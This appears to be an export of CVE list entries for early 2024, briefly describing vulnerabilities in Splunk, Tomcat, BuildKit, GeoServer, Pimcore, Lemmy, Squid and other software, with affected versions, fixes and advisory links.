CVE    2024    23677    Candidate    In Splunk Enterprise versions below 9.0.8, the Splunk RapidDiag utility discloses server responses from external applications in a log file.    MISC:https://advisory.splunk.com/advisories/SVD-2024-0107   |   URL:https://advisory.splunk.com/advisories/SVD-2024-0107    Assigned (20240119)
CVE    2024    23676    Candidate    In Splunk versions below 9.0.8 and 9.1.3, the “mrollup” SPL command lets a low-privileged user view metrics on an index that they do not have permission to view. This vulnerability requires user interaction from a high-privileged user to exploit.    MISC:https://advisory.splunk.com/advisories/SVD-2024-0106   |   URL:https://advisory.splunk.com/advisories/SVD-2024-0106   |   MISC:https://research.splunk.com/application/ee69374a-d27e-4136-adac-956a96ff60fd/   |   URL:https://research.splunk.com/application/ee69374a-d27e-4136-adac-956a96ff60fd/    Assigned (20240119)
CVE    2024    23675    Candidate    In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store (KV Store) improperly handles permissions for users that use the REST application programming interface (API). This can potentially result in the deletion of KV Store collections.    MISC:https://advisory.splunk.com/advisories/SVD-2024-0105   |   URL:https://advisory.splunk.com/advisories/SVD-2024-0105   |   MISC:https://research.splunk.com/application/8f0e8380-a835-4f2b-b749-9ce119364df0/   |   URL:https://research.splunk.com/application/8f0e8380-a835-4f2b-b749-9ce119364df0/    Assigned (20240119)
CVE    2024    23674    Candidate    The Online-Ausweis-Funktion eID scheme in the German National Identity card through 2024-02-15 allows authentication bypass by spoofing. A man-in-the-middle attacker can assume a victim's identity for access to government, medical, and financial resources, and can also extract personal data from the card, aka the "sPACE (Spoofing Password Authenticated Connection Establishment)" issue. This occurs because of a combination of factors, such as insecure PIN entry (for basic readers) and eid:// deeplinking. The victim must be using a modified eID kernel, which may occur if the victim is tricked into installing a fake version of an official app. NOTE: the BSI position is "ensuring a secure operational environment at the client side is an obligation of the ID card owner."    MISC:https://ctrlalt.medium.com/space-attack-spoofing-eids-password-authenticated-connection-establishment-11561e5657b1   |   MISC:https://www.ausweisapp.bund.de/   |   MISC:https://www.dropbox.com/scl/fi/2powlii0dnmr7p7v5ijhc/2024_German_eID_02_Spoofing_PACE_final.pdf?rlkey=nx0ffmmbq3hffgxsuqwf0f45z&dl=0   |   MISC:https://www.personalausweisportal.de/    Assigned (20240119)
CVE    2024    23673    Candidate    Malicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver. This issue affects all versions of Apache Sling Servlets Resolver before 2.11.0. However, whether a system is vulnerable to this attack depends on the exact configuration of the system. If the system is vulnerable, a user with write access to the repository might be able to trick the Sling Servlet Resolver to load a previously uploaded script. Users are recommended to upgrade to version 2.11.0, which fixes this issue. It is recommended to upgrade, regardless of whether your system configuration currently allows this attack or not.    MISC:https://lists.apache.org/thread/5zzx8ztwc6tmbwlw80m2pbrp3913l2kl   |   URL:https://lists.apache.org/thread/5zzx8ztwc6tmbwlw80m2pbrp3913l2kl   |   MLIST:[oss-security] 20240206 CVE-2024-23673: Apache Sling Servlets Resolver: Malicious code execution via path traversal   |   URL:http://www.openwall.com/lists/oss-security/2024/02/06/1    Assigned (20240119)
CVE    2024    23672    Candidate    Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98. Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.    MISC:https://lists.apache.org/thread/cmpswfx6tj4s7x0nxxosvfqs11lvdx2f   |   URL:https://lists.apache.org/thread/cmpswfx6tj4s7x0nxxosvfqs11lvdx2f    Assigned (20240119)
CVE    2024    23660    Candidate    The Binance Trust Wallet app for iOS in commit 3cd6e8f647fbba8b5d8844fcd144365a086b629f, git tag 0.0.4 misuses the trezor-crypto library and consequently generates mnemonic words for which the device time is the only entropy source, leading to economic losses, as exploited in the wild in July 2023. An attacker can systematically generate mnemonics for each timestamp within an applicable timeframe, and link them to specific wallet addresses in order to steal funds from those wallets.    MISC:https://milksad.info/posts/research-update-5/   |   MISC:https://secbit.io/blog/en/2024/01/19/trust-wallets-fomo3d-summer-vuln/    Assigned (20240119)
CVE    2024    23659    Candidate    SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js.    MISC:https://blog.spip.net/Mise-a-jour-de-maintenance-et-securite-sortie-de-SPIP-4-2-8-SPIP-4-1-14.html?lang=fr   |   MISC:https://git.spip.net/spip/bigup/commit/0757f015717cb72b84dba0e9a375ec71caddf1c2   |   MISC:https://git.spip.net/spip/bigup/commit/ada821c076d67d1147a195178223d0b4a6d8cecc    Assigned (20240119)
CVE    2024    23656    Candidate    Dex is an identity service that uses OpenID Connect to drive authentication for other apps. Dex 2.37.0 serves HTTPS with insecure TLS 1.0 and TLS 1.1. `cmd/dex/serve.go` line 425 seemingly sets TLS 1.2 as minimum version, but the whole `tlsConfig` is ignored after `TLS cert reloader` was introduced in v2.37.0. Configured cipher suites are not respected either. This issue is fixed in Dex 2.38.0.    MISC:https://github.com/dexidp/dex/blob/70d7a2c7c1bb2646b1a540e49616cbc39622fb83/cmd/dex/serve.go#L425   |   URL:https://github.com/dexidp/dex/blob/70d7a2c7c1bb2646b1a540e49616cbc39622fb83/cmd/dex/serve.go#L425   |   MISC:https://github.com/dexidp/dex/commit/5bbdb4420254ba73b9c4df4775fe7bdacf233b17   |   URL:https://github.com/dexidp/dex/commit/5bbdb4420254ba73b9c4df4775fe7bdacf233b17   |   MISC:https://github.com/dexidp/dex/issues/2848   |   URL:https://github.com/dexidp/dex/issues/2848   |   MISC:https://github.com/dexidp/dex/pull/2964   |   URL:https://github.com/dexidp/dex/pull/2964   |   MISC:https://github.com/dexidp/dex/security/advisories/GHSA-gr79-9v6v-gc9r   |   URL:https://github.com/dexidp/dex/security/advisories/GHSA-gr79-9v6v-gc9r    Assigned (20240119)
CVE    2024    23655    Candidate    Tuta is an encrypted email service. Starting in version 3.118.12 and prior to version 3.119.10, an attacker is able to send a manipulated email so that the user can no longer use the app to get access to received emails. By sending a manipulated email, an attacker could put the app into an unusable state. In this case, a user can no longer access received e-mails. Since the vulnerability affects not only the app, but also the web application, a user in this case has no way to access received emails. This issue was tested with iOS and the web app, but it is possible all clients are affected. Version 3.119.10 fixes this issue.    MISC:https://github.com/tutao/tutanota/releases/tag/tutanota-release-3.119.10   |   URL:https://github.com/tutao/tutanota/releases/tag/tutanota-release-3.119.10   |   MISC:https://github.com/tutao/tutanota/security/advisories/GHSA-5h47-g927-629g   |   URL:https://github.com/tutao/tutanota/security/advisories/GHSA-5h47-g927-629g    Assigned (20240119)
CVE    2024    23654    Candidate    discourse-ai is the AI plugin for the open-source discussion platform Discourse. Prior to commit 94ba0dadc2cf38e8f81c3936974c167219878edd, interactions with different AI services are vulnerable to admin-initiated SSRF attacks. Versions of the plugin that include commit 94ba0dadc2cf38e8f81c3936974c167219878edd contain a patch. As a workaround, one may disable the discourse-ai plugin.    MISC:https://github.com/discourse/discourse-ai/commit/94ba0dadc2cf38e8f81c3936974c167219878edd   |   URL:https://github.com/discourse/discourse-ai/commit/94ba0dadc2cf38e8f81c3936974c167219878edd   |   MISC:https://github.com/discourse/discourse-ai/security/advisories/GHSA-32cj-rm2q-22cc   |   URL:https://github.com/discourse/discourse-ai/security/advisories/GHSA-32cj-rm2q-22cc    Assigned (20240119)
CVE    2024    23653    Candidate    BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request. The issue has been fixed in v0.12.5. Avoid using BuildKit frontends from untrusted sources.    MISC:https://github.com/moby/buildkit/pull/4602   |   URL:https://github.com/moby/buildkit/pull/4602   |   MISC:https://github.com/moby/buildkit/releases/tag/v0.12.5   |   URL:https://github.com/moby/buildkit/releases/tag/v0.12.5   |   MISC:https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g   |   URL:https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g    Assigned (20240119)
CVE    2024    23652    Candidate    BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature.    MISC:https://github.com/moby/buildkit/pull/4603   |   URL:https://github.com/moby/buildkit/pull/4603   |   MISC:https://github.com/moby/buildkit/releases/tag/v0.12.5   |   URL:https://github.com/moby/buildkit/releases/tag/v0.12.5   |   MISC:https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8   |   URL:https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8    Assigned (20240119)
CVE    2024    23651    Candidate    BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Two malicious build steps running in parallel sharing the same cache mounts with subpaths could cause a race condition that can lead to files from the host system being accessible to the build container. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing cache mounts with --mount=type=cache,source=... options.    MISC:https://github.com/moby/buildkit/pull/4604   |   URL:https://github.com/moby/buildkit/pull/4604   |   MISC:https://github.com/moby/buildkit/releases/tag/v0.12.5   |   URL:https://github.com/moby/buildkit/releases/tag/v0.12.5   |   MISC:https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv   |   URL:https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv    Assigned (20240119)
CVE    2024    23650    Candidate    BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit client or frontend could craft a request that could lead to BuildKit daemon crashing with a panic. The issue has been fixed in v0.12.5. As a workaround, avoid using BuildKit frontends from untrusted sources.    MISC:https://github.com/moby/buildkit/pull/4601   |   URL:https://github.com/moby/buildkit/pull/4601   |   MISC:https://github.com/moby/buildkit/releases/tag/v0.12.5   |   URL:https://github.com/moby/buildkit/releases/tag/v0.12.5   |   MISC:https://github.com/moby/buildkit/security/advisories/GHSA-9p26-698r-w4hx   |   URL:https://github.com/moby/buildkit/security/advisories/GHSA-9p26-698r-w4hx    Assigned (20240119)
CVE    2024    2365    Candidate    A vulnerability classified as problematic was found in Musicshelf 1.0/1.1 on Android. Affected by this vulnerability is an unknown functionality of the file io\fabric\sdk\android\services\network\PinningTrustManager.java of the component SHA-1 Handler. The manipulation leads to password hash with insufficient computational effort. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-256321 was assigned to this vulnerability.    MISC:VDB-256321 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256321   |   MISC:VDB-256321 | Musicshelf SHA-1 PinningTrustManager.java weak password hash   |   URL:https://vuldb.com/?id.256321   |   MISC:https://github.com/ctflearner/Android_Findings/blob/main/Musicshelf/Weak_Hashing_Algorithms.md   |   URL:https://github.com/ctflearner/Android_Findings/blob/main/Musicshelf/Weak_Hashing_Algorithms.md    Assigned (20240310)
CVE    2024    23649    Candidate    Lemmy is a link aggregator and forum for the fediverse. Starting in version 0.17.0 and prior to version 0.19.1, users can report private messages, even when they're neither sender nor recipient of the message. The API response to creating a private message report contains the private message itself, which means any user can just iterate over message ids to (loudly) obtain all private messages of an instance. A user with instance admin privileges can also abuse this if the private message is removed from the response, as they're able to see the resulting reports. Creating a private message report by POSTing to `/api/v3/private_message/report` does not validate whether the reporter is the recipient of the message. lemmy-ui does not allow the sender to report the message; the API method should likely be restricted to be accessible to recipients only. The API response when creating a report contains the `private_message_report_view` with all the details of the report, including the private message that has been reported: Any authenticated user can obtain arbitrary (untargeted) private message contents. Privileges required depend on the instance configuration; when registrations are enabled without application system, the privileges required are practically none. When registration applications are required, privileges required could be considered low, but this assessment heavily varies by instance. Version 0.19.1 contains a patch for this issue. A workaround is available. If an update to a fixed Lemmy version is not immediately possible, the API route can be blocked in the reverse proxy. This will prevent anyone from reporting private messages, but it will also prevent exploitation before the update has been applied.    
MISC:https://github.com/LemmyNet/lemmy/commit/bc32b408b523b9b64aa57b8e47748f96cce0dae5   |   URL:https://github.com/LemmyNet/lemmy/commit/bc32b408b523b9b64aa57b8e47748f96cce0dae5   |   MISC:https://github.com/LemmyNet/lemmy/security/advisories/GHSA-r64r-5h43-26qv   |   URL:https://github.com/LemmyNet/lemmy/security/advisories/GHSA-r64r-5h43-26qv    Assigned (20240119)
CVE    2024    23648    Candidate    Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. The password reset functionality sends the user requesting a password change an email containing a URL to reset their password. The URL sent contains a unique token, valid for 24 hours, allowing the user to reset their password. This token is highly sensitive, as an attacker able to retrieve it would be able to reset the user's password. Prior to version 1.2.3, the reset-password URL is crafted using the "Host" HTTP header of the request sent to request a password reset. This way, an external attacker could send password requests for users, but specify a "Host" header of a website that they control. If the user receiving the mail clicks on the link, the attacker would retrieve the reset token of the victim and perform account takeover. Version 1.2.3 fixes this issue.    MISC:https://github.com/pimcore/admin-ui-classic-bundle/commit/70f2205b5a5ea9584721d4f3e803f4d0dd5e4655   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/commit/70f2205b5a5ea9584721d4f3e803f4d0dd5e4655   |   MISC:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-mrqg-mwh7-q94j   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-mrqg-mwh7-q94j    Assigned (20240119)
CVE    2024    23647    Candidate    Authentik is an open-source Identity Provider. There is a bug in our implementation of PKCE that allows an attacker to circumvent the protection that PKCE offers. PKCE adds the code_challenge parameter to the authorization request and adds the code_verifier parameter to the token request. Prior to 2023.8.7 and 2023.10.7, a downgrade scenario is possible: if the attacker removes the code_challenge parameter from the authorization request, authentik will not do the PKCE check. Because of this bug, an attacker can circumvent the protection PKCE offers, such as CSRF attacks and code injection attacks. Versions 2023.8.7 and 2023.10.7 fix the issue.    MISC:https://github.com/goauthentik/authentik/commit/38e04ae12720e5d81b4f7ac77997eb8d1275d31a   |   URL:https://github.com/goauthentik/authentik/commit/38e04ae12720e5d81b4f7ac77997eb8d1275d31a   |   MISC:https://github.com/goauthentik/authentik/security/advisories/GHSA-mrx3-gxjx-hjqj   |   URL:https://github.com/goauthentik/authentik/security/advisories/GHSA-mrx3-gxjx-hjqj    Assigned (20240119)
CVE    2024    23646    Candidate    Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. The application allows users to create zip files from available files on the site. In the 1.x branch prior to version 1.3.2, parameter `selectedIds` is susceptible to SQL Injection. Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level. Version 1.3.2 contains a fix for this issue.    MISC:https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006   |   MISC:https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087   |   MISC:https://github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8   |   MISC:https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2   |   MISC:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-cwx6-4wmf-c6xv   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-cwx6-4wmf-c6xv    Assigned (20240119)
CVE    2024    23645    Candidate    GLPI is a Free Asset and IT Management Software package. A malicious URL can be used to execute XSS on reports pages. Upgrade to 10.0.12.    MISC:https://github.com/glpi-project/glpi/commit/6cf265936c4f6edf7dea7c78b12e46d75b94d9b0   |   URL:https://github.com/glpi-project/glpi/commit/6cf265936c4f6edf7dea7c78b12e46d75b94d9b0   |   MISC:https://github.com/glpi-project/glpi/commit/fc1f6da9d158933b870ff374ed3a50ae98dcef4a   |   URL:https://github.com/glpi-project/glpi/commit/fc1f6da9d158933b870ff374ed3a50ae98dcef4a   |   MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.12   |   URL:https://github.com/glpi-project/glpi/releases/tag/10.0.12   |   MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-2gj5-qpff-ff3x   |   URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-2gj5-qpff-ff3x    Assigned (20240119)
CVE    2024    23644    Candidate    Trillium is a composable toolkit for building internet applications with async rust. In `trillium-http` prior to 0.3.12 and `trillium-client` prior to 0.5.4, insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over headers. This only affects use cases where attackers have control of request headers, and can insert "\r\n" sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values. Outbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending requests from the client or responses from the server. Thus, if an attacker has sufficient control over header values (or names) in a request or response that they could inject `\r\n` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses. (i.e. exfiltrating data from other requests, SSRF, etc.) In `trillium-http` versions 0.3.12 and later, if a header name is invalid in server response headers, the specific header and any associated values are omitted from network transmission. Additionally, if a header value is invalid in server response headers, the individual header value is omitted from network transmission. Other header values with the same header name will still be sent. In `trillium-client` versions 0.5.4 and later, if any header name or header value is invalid in the client request headers, awaiting the client Conn returns an `Error::MalformedHeader` prior to any network access. As a workaround, Trillium services and client applications should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed.    
MISC:https://github.com/trillium-rs/trillium/commit/16a42b3f8378a3fa4e61ece3e3e37e6a530df51d   |   URL:https://github.com/trillium-rs/trillium/commit/16a42b3f8378a3fa4e61ece3e3e37e6a530df51d   |   MISC:https://github.com/trillium-rs/trillium/commit/8d468f85e27b8d0943d6f43ce9f8c7397141a999   |   URL:https://github.com/trillium-rs/trillium/commit/8d468f85e27b8d0943d6f43ce9f8c7397141a999   |   MISC:https://github.com/trillium-rs/trillium/security/advisories/GHSA-9f9p-cp3c-72jf   |   URL:https://github.com/trillium-rs/trillium/security/advisories/GHSA-9f9p-cp3c-72jf    Assigned (20240119)
CVE    2024    23643    Candidate    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.2 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another administrator’s browser when viewed in the GWC Seed Form. Access to the GWC Seed Form is limited to full administrators by default and granting non-administrators access to this endpoint is not recommended. Versions 2.23.2 and 2.24.1 contain a fix for this issue.    MISC:https://github.com/GeoWebCache/geowebcache/commit/9d010e09c784690ada8af43f594461a2553a62f0   |   URL:https://github.com/GeoWebCache/geowebcache/commit/9d010e09c784690ada8af43f594461a2553a62f0   |   MISC:https://github.com/GeoWebCache/geowebcache/issues/1172   |   URL:https://github.com/GeoWebCache/geowebcache/issues/1172   |   MISC:https://github.com/GeoWebCache/geowebcache/pull/1174   |   URL:https://github.com/GeoWebCache/geowebcache/pull/1174   |   MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-56r3-f536-5gf7   |   URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-56r3-f536-5gf7    Assigned (20240119)
CVE    2024    23642    Candidate    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the WMS GetMap SVG Output Format when the Simple SVG renderer is enabled. Access to the WMS SVG Format is available to all users by default although data and service security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a fix for this issue.    MISC:https://github.com/geoserver/geoserver/commit/1b1835afbb9c282d1840786259aeda81c1d22b00   |   URL:https://github.com/geoserver/geoserver/commit/1b1835afbb9c282d1840786259aeda81c1d22b00   |   MISC:https://github.com/geoserver/geoserver/commit/9f40265febb5939f23e2c53930c9c35e93970afe   |   URL:https://github.com/geoserver/geoserver/commit/9f40265febb5939f23e2c53930c9c35e93970afe   |   MISC:https://github.com/geoserver/geoserver/pull/7173   |   URL:https://github.com/geoserver/geoserver/pull/7173   |   MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-fg9v-56hw-g525   |   URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-fg9v-56hw-g525   |   MISC:https://osgeo-org.atlassian.net/browse/GEOS-11152   |   URL:https://osgeo-org.atlassian.net/browse/GEOS-11152    Assigned (20240119)
CVE    2024    23641    Candidate    SvelteKit is a web development kit. In SvelteKit 2, sending a GET request with a body, e.g. `{}`, to a built and previewed/hosted SvelteKit app throws `Request with GET/HEAD method cannot have body.` and crashes the preview/hosting. After this happens, one must manually restart the app. `TRACE` requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected. `@sveltejs/adapter-node` versions 2.1.2, 3.0.3, and 4.0.1 and `@sveltejs/kit` version 2.4.3 contain a patch for this issue.    MISC:https://github.com/sveltejs/kit/commit/af34142631c876a7eb62ff81f71e8a3f90dafee9   |   URL:https://github.com/sveltejs/kit/commit/af34142631c876a7eb62ff81f71e8a3f90dafee9   |   MISC:https://github.com/sveltejs/kit/security/advisories/GHSA-g5m6-hxpp-fc49   |   URL:https://github.com/sveltejs/kit/security/advisories/GHSA-g5m6-hxpp-fc49    Assigned (20240119)
CVE    2024    23640    Candidate    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.3 and 2.24.0 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in uploaded style/legend resources or in a specially crafted datastore file that will execute in the context of another user's browser when viewed in the Style Publisher. Access to the Style Publisher is available to all users although data security may limit users' ability to trigger the XSS. Versions 2.23.3 and 2.24.0 contain a fix for this issue.    MISC:https://github.com/geoserver/geoserver/pull/7162   |   URL:https://github.com/geoserver/geoserver/pull/7162   |   MISC:https://github.com/geoserver/geoserver/pull/7181   |   URL:https://github.com/geoserver/geoserver/pull/7181   |   MISC:https://github.com/geoserver/geoserver/security/advisories/GHSA-9rfr-pf2x-g4xf   |   URL:https://github.com/geoserver/geoserver/security/advisories/GHSA-9rfr-pf2x-g4xf   |   MISC:https://osgeo-org.atlassian.net/browse/GEOS-11149   |   URL:https://osgeo-org.atlassian.net/browse/GEOS-11149   |   MISC:https://osgeo-org.atlassian.net/browse/GEOS-11155   |   URL:https://osgeo-org.atlassian.net/browse/GEOS-11155    Assigned (20240119)
CVE    2024    2364    Candidate    A vulnerability classified as problematic has been found in Musicshelf 1.0/1.1 on Android. Affected is an unknown function of the file androidmanifest.xml of the component Backup Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256320.    MISC:VDB-256320 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256320   |   MISC:VDB-256320 | Musicshelf Backup androidmanifest.xml backup   |   URL:https://vuldb.com/?id.256320   |   MISC:https://github.com/ctflearner/Android_Findings/blob/main/Musicshelf/Musicshelf_Manifest_issue.md   |   URL:https://github.com/ctflearner/Android_Findings/blob/main/Musicshelf/Musicshelf_Manifest_issue.md    Assigned (20240310)
CVE    2024    23639    Candidate    Micronaut Framework is a modern, JVM-based, full stack Java framework designed for building modular, easily testable JVM applications with support for Java, Kotlin and the Groovy language. Enabled but unsecured management endpoints are susceptible to drive-by localhost attacks. While not typical of a production application, these attacks may have more impact on a development environment where such endpoints may be flipped on without much thought. A malicious/compromised website can make HTTP requests to `localhost`. Normally, such requests would trigger a CORS preflight check which would prevent the request; however, some requests are "simple" and do not require a preflight check. These endpoints, if enabled and not secured, are vulnerable to being triggered. Production environments typically disable unused endpoints and secure/restrict access to needed endpoints. A more likely victim is the developer in their local development host, who has enabled endpoints without security for the sake of easing development. This issue has been addressed in version 3.8.3. Users are advised to upgrade.    MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests   |   URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests   |   MISC:https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-583g-g682-crxf   |   URL:https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-583g-g682-crxf    Assigned (20240119)
CVE    2024    23638    Candidate    Squid is a caching proxy for the Web. Due to an expired pointer reference bug, Squid prior to version 6.6 is vulnerable to a Denial of Service attack against Cache Manager error responses. This problem allows a trusted client to perform Denial of Service when generating error pages for Client Manager reports. Squid older than 5.0.5 have not been tested and should be assumed to be vulnerable. All Squid-5.x up to and including 5.9 are vulnerable. All Squid-6.x up to and including 6.5 are vulnerable. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives. As a workaround, prevent access to Cache Manager using Squid's main access control: `http_access deny manager`.    CONFIRM:https://security.netapp.com/advisory/ntap-20240208-0010/   |   MISC:http://www.squid-cache.org/Versions/v5/SQUID-2023_11.patch   |   URL:http://www.squid-cache.org/Versions/v5/SQUID-2023_11.patch   |   MISC:http://www.squid-cache.org/Versions/v6/SQUID-2023_11.patch   |   URL:http://www.squid-cache.org/Versions/v6/SQUID-2023_11.patch   |   MISC:https://github.com/squid-cache/squid/commit/290ae202883ac28a48867079c2fb34c40efd382b   |   URL:https://github.com/squid-cache/squid/commit/290ae202883ac28a48867079c2fb34c40efd382b   |   MISC:https://github.com/squid-cache/squid/commit/e8118a7381213f5cfcdeb4cec1d2d854bfd261c8   |   URL:https://github.com/squid-cache/squid/commit/e8118a7381213f5cfcdeb4cec1d2d854bfd261c8   |   MISC:https://github.com/squid-cache/squid/security/advisories/GHSA-j49p-553x-48rx   |   URL:https://github.com/squid-cache/squid/security/advisories/GHSA-j49p-553x-48rx   |   MISC:https://megamansec.github.io/Squid-Security-Audit/stream-assert.html   |   URL:https://megamansec.github.io/Squid-Security-Audit/stream-assert.html    Assigned (20240119)
CVE    2024    23637    Candidate    OctoPrint is a web interface for 3D printers. OctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to change the password of other admin accounts, including their own, without having to repeat their password. An attacker who managed to hijack an admin account might use this to lock out actual admins from their OctoPrint instance. The vulnerability will be patched in version 1.10.0.    MISC:https://github.com/OctoPrint/OctoPrint/commit/1729d167b4ae4a5835bbc7211b92c6828b1c4125   |   URL:https://github.com/OctoPrint/OctoPrint/commit/1729d167b4ae4a5835bbc7211b92c6828b1c4125   |   MISC:https://github.com/OctoPrint/OctoPrint/releases/tag/1.10.0rc1   |   URL:https://github.com/OctoPrint/OctoPrint/releases/tag/1.10.0rc1   |   MISC:https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-5626-pw9c-hmjr   |   URL:https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-5626-pw9c-hmjr    Assigned (20240119)
CVE    2024    23636    Candidate    SOFARPC is a Java RPC framework. SOFARPC defaults to using the SOFA Hessian protocol to deserialize received data, while the SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But, prior to version 5.12.0, there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components. Version 5.12.0 fixed this issue by adding a blacklist. SOFARPC also provides a way to add additional blacklists. Users can add a class like `-Drpc_serialize_blacklist_override=org.apache.xpath.` to avoid this issue.    MISC:https://github.com/sofastack/sofa-rpc/commit/42d19b1b1d14a25aafd9ef7c219c04a19f90fc76   |   URL:https://github.com/sofastack/sofa-rpc/commit/42d19b1b1d14a25aafd9ef7c219c04a19f90fc76   |   MISC:https://github.com/sofastack/sofa-rpc/security/advisories/GHSA-7q8p-9953-pxvr   |   URL:https://github.com/sofastack/sofa-rpc/security/advisories/GHSA-7q8p-9953-pxvr    Assigned (20240119)
CVE    2024    23635    Candidate    AntiSamy is a library for performing fast, configurable cleansing of HTML coming from untrusted sources. Prior to 1.7.5, there is a potential for a mutation XSS (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the `preserveComments` directive must be enabled in your policy file. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy's sanitized output. Patched in AntiSamy 1.7.5 and later.    MISC:https://github.com/nahsra/antisamy/security/advisories/GHSA-2mrq-w8pv-5pvq   |   URL:https://github.com/nahsra/antisamy/security/advisories/GHSA-2mrq-w8pv-5pvq    Assigned (20240119)
